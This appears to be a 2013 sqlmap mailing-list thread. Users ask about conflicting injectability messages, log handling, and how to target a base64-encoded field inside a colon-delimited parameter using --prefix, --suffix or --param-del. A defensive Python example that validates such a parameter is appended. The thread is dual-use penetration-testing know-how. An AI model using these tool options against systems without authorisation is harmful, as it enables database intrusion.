On Fri, Jun 28, 2013 at 7:35 AM, Heidi Petersen <hei...@gm...> wrote:

> Hello! New to sqlmap and I'm running some long tests, but I have a few
> questions.
>
> I'm seeing
> [INFO] target URL appears to be UNION injectable with x columns
> and then
> [WARNING] GET parameter 'xxxxxxx' is not injectable
>
> there is nothing in the log file.
>
> So two questions:
> 1)if it seemed injectable but then ran further tests, why does it say
> it's injectable and then that parameter isn't?
> 2)I ran this with a lower level earlier in the day on the same target. I
> didn't replace the log file. Is the new info being logged or am I losing
> this info?
>
> Much appreciated,
> Heidi

--
Miroslav Stampar
http://about.me/stamparm |
From: Heidi P. <hei...@gm...> - 2013-06-28 05:35:17
|
Hello! New to sqlmap and I'm running some long tests, but I have a few questions.

I'm seeing
[INFO] target URL appears to be UNION injectable with x columns
and then
[WARNING] GET parameter 'xxxxxxx' is not injectable

there is nothing in the log file.

So two questions:
1) if it seemed injectable but then ran further tests, why does it say it's injectable and then that parameter isn't?
2) I ran this with a lower level earlier in the day on the same target. I didn't replace the log file. Is the new info being logged or am I losing this info?

Much appreciated,
Heidi |
From: Dennis <kor...@ya...> - 2013-06-24 15:06:03
|
Maybe I don't understand your case completely, but wouldn't --prefix and --suffix help here?

E.g. --prefix="firstvalue:" --suffix=":12"

Cheers,
Dennis

On 24.06.2013 16:36, Miroslav Stampar wrote:

> Hi.
>
> There is a --param-del option, but in your case --param-del=":" would
> do more harm than good. It separates pairs (parameter=value), but in
> your cases there is no clear separation for doing such thing.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Jun 24, 2013 at 3:33 PM, Sebastian Nerz
> <seb...@sy...> wrote:
>
>     Hi,
>
>     my apologies, if the question is covered in the documentation, but I
>     could not find anything.
>
>     Does SQLMAP support providing parameter limits? An example:
>
>     param=firstvalue:MTIz:12
>     decoded:
>     param=firstvalue:123:12
>
>     I'd love to e.g. use base64encode. but for this I would have to be
>     able
>     to tell SQLMAP the delimiters or start- and endpositions (e.g.:
>     param=firstvalue:#123*:12, where the parameter would be 123)
>
>     All the best,
>
>     Sebastian Nerz
>
> --
> Miroslav Stampar
> http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2013-06-24 14:36:53
|
Hi.

There is a --param-del option, but in your case --param-del=":" would do more harm than good. It separates pairs (parameter=value), but in your cases there is no clear separation for doing such thing.

Kind regards,
Miroslav Stampar

On Mon, Jun 24, 2013 at 3:33 PM, Sebastian Nerz <seb...@sy...> wrote:

> Hi,
>
> my apologies, if the question is covered in the documentation, but I
> could not find anything.
>
> Does SQLMAP support providing parameter limits? An example:
>
> param=firstvalue:MTIz:12
> decoded:
> param=firstvalue:123:12
>
> I'd love to e.g. use base64encode. but for this I would have to be able
> to tell SQLMAP the delimiters or start- and endpositions (e.g.:
> param=firstvalue:#123*:12, where the parameter would be 123)
>
> All the best,
>
> Sebastian Nerz

--
Miroslav Stampar
http://about.me/stamparm |
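Seen from the application side, the composite value in this thread ("param=firstvalue:MTIz:12") only stays safe if the server decodes the base64 field and then validates the decoded text before it reaches SQL. The following is an added example, not code from the thread or from sqlmap; the "items" table, the field meanings and all function names are assumptions made for illustration.

```python
import base64
import re
import sqlite3

DIGITS = re.compile(r"[0-9]{1,9}")        # ASCII digits only, bounded length
LABEL = re.compile(r"[A-Za-z0-9_]{1,32}")


class InvalidParam(ValueError):
    """The composite parameter did not match the expected shape."""


def parse_composite(raw):
    """Parse 'label:<base64 of id>:<count>' into (label, id, count)."""
    parts = raw.split(":")
    if len(parts) != 3:
        raise InvalidParam("expected three ':'-separated fields")
    label, encoded_id, count = parts
    try:
        # validate=True rejects non-alphabet characters instead of skipping them
        decoded = base64.b64decode(encoded_id, validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        raise InvalidParam("middle field is not base64-encoded ASCII")
    # Decoding is not validation: check the decoded text, not the wire form.
    if not (LABEL.fullmatch(label) and DIGITS.fullmatch(decoded)
            and DIGITS.fullmatch(count)):
        raise InvalidParam("field content outside the allowed character set")
    return label, int(decoded), int(count)


def demo_db():
    """Constructed in-memory table standing in for the application's data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [(123, "widget"), (124, "gadget")])
    return conn


def lookup(conn, raw):
    """Validate the composite value, then query with bound parameters only."""
    _label, item_id, count = parse_composite(raw)
    rows = conn.execute("SELECT name FROM items WHERE id = ? LIMIT ?",
                        (item_id, count))
    return [name for (name,) in rows]


if __name__ == "__main__":
    # Sample value taken from the question in the thread.
    print(lookup(demo_db(), "firstvalue:MTIz:12"))
```

A middle field that decodes to anything other than a short run of digits is rejected before any query is built, and the accepted values are passed as bound parameters rather than concatenated into the statement.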